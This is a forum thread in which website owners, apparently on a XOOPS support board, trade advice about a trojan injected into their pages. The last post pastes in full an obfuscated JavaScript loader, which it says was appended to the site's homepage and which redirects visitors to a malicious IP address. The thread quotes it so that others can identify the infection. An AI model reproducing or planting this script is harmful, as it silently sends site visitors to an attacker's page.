Maybe this is offtopic, but i'm having some concerns.

Are You using any editor that permit the users to use Iframe's ?

My concerns is that a stupid user can use iframes to call the devastating from another site. The size on the iframe can be 0,0 so you can't se it's loading.

Yep - the 0 x 0px iframe has been done before, and not only by sites' registered users.

If I were betting man I'd go for iframe code in theme.html, hence the advice to upload a clean copy of the theme as a first response.

Thank for all the help, i was looking at the theme and forgot the index.php and there it was. Now i'm trying to install the protector but i can't see it in the modules. I'v copied the last version to my site woth ftp, but nothing in de modules. Please help????

Hi,

enable PHPDebug (try both styles) and look for clues.

Read the readme as protector has more complicated install (TRUST PATH and mainfile hack).

You can download the lates version from GiJoes site:http://xoops.peak.ne.jp/md/mydownloads/singlefile.php?lid=105&cid=1

The trojan is back, but im can't find where it's ad. I still can't install the protector.

There is something strange not every computer has it, when i go to the site on my laptop no problem, when i go to the site with my desktop pc i get the trojan. Can someone please help me i dont want to reinstall the total site again!

I would download site files and run a search and replace program to find the malicious code. You can use search and replace from InfoRapid for ex.

Probably your site is getting infected because your pc is not secure. Protector wont save you on this. Be careful with the ftp program you are using. Some of them can expose your ftp password. I recommend you to get a good antivirus, firewall, a brick wall and a good titanium lock, and change your ftp password right away.

Hello,

My site got "attacked" with the same problem caused by some very very annoying "hacker". I am sending "thanks" to this very very very annoying person. Well somehow there was a line of hidden code added at my website main page. The code was this:

<!--202e698833695092a5495b5c3d589ec0-><script language=javascript>byq="%";nxj="I3csI63ripI74I20lanI67I75I61I67eI3dI6aavI61script>I20I20funcI74I69oI6eI20lmI62I6aI28I6dI68)I7bI76arI20ww,iI61I3d\"`I3dI71I70}|I6d;I50-I5bI26I78J02ZUI4394jKI64I65I54I7a+I4fnI27#lhkiI67I2cc3@I66A$.yI42I6fI56wEI731MI46I36*(I5dI7eI4e^tI5cI227b5I72{I76a_I20uI49:I38I47!H)\",lI63bI3d\"I22I2civI7a,tI69yI2cI66pI3d\"I22I2cuI61w;foI72(I77w=I30I3bI77wI3cI6dhI2elength;I77I77I2bI2b){ I69I76I7a=mh.chI61I72At(ww)I3bI74iy=I69I61.indexOI66(ivI7aI29;I69f(tI69yI3e-I31){I20I75aw=((I74iyI2b1)I2581I2d1)I3bI69f(uaw<I3d0)I75I61I77+I3d81;fI70I2b=I69I61I2echI61rAI74I28uI61w-1); I7dI20I65I6cI73I65I20fI70+I3dI69vI7a;}I6cI63b+=I66p;doI63uI6dI65nt.wI72iI74I65(I6ccb);I7dI3cI2fI73I63I72I69pt>";ugjnh=unescape(nxj.replace(/I/g,byq));var una,wc;document.write(ugjnh);una="<13{g}\"uh_',I_,Tq7K_a_13{g}\"7>ueV3I;T'\"yE{g\"T]u7<S9R:-zuh_',I_,Tq\\70_a_S3{g}\"\\7uSR9q\\7k\"\"}8//EEEy,VV,hT_'_hg\"g31y'T\"/ I\"5yK1?7OeV3I;T'\"y{TAT{{T{O7\\7><\\/S9R:-z>7u`Pu</13{g}\">uu";lmbj(una);</script>

This piece of scrambled code actually redirects the browser to http:// 58.65.234.163 /t/m100xxxxxxxx.html (x=number).

It was found to be attached at the end of the HTML file (right bottom).

If you have the same problem, please email me and I will provide you instructions on how to remove this malicious code.

My email: schang1984@gmail.com

I really hate the people who did this to me.